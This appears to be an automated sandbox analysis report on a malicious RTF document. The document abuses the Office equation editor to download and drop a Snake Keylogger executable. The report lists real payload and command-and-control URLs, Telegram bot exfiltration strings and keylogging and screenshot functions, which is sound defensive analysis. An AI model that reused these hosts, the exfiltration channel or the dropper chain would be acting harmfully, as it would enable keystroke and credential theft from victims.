Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.392546083.000000000061A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe7j
Source: EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exej
Source: EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.120.84.38/txt/pKL9HXcZosWfPt1.exettC:
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: cmnjgwhesilo61000.exe, 00000007.00000002.661339983.0000000005B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.661339983.0000000005B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408443204.0000000002674000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=net
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=wmf
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003811000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003748000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000381E000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000376A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/indextest

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Initial sample is an obfuscated RTF file

Source: initial sample

Static file information: Filename: na.doc

Malicious sample detected (through community Yara rule)

Source: na.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Code function: 5_2_002C4924 NtQueryInformationProcess,

5_2_002C4924

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002CA298	5_2_002CA298
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C0514	5_2_002C0514
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C49D9	5_2_002C49D9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C5CA9	5_2_002C5CA9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C1141	5_2_002C1141
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C81F0	5_2_002C81F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002CA28A	5_2_002CA28A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002CA4F7	5_2_002CA4F7
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002CA508	5_2_002CA508
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C78F8	5_2_002C78F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_002C7D30	5_2_002C7D30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_006E0DF8	5_2_006E0DF8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_006E09C0	5_2_006E09C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_006E1230	5_2_006E1230
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_006E1B50	5_2_006E1B50
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 5_2_006E1718	5_2_006E1718
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_002B40F8	7_2_002B40F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_002B390C	7_2_002B390C
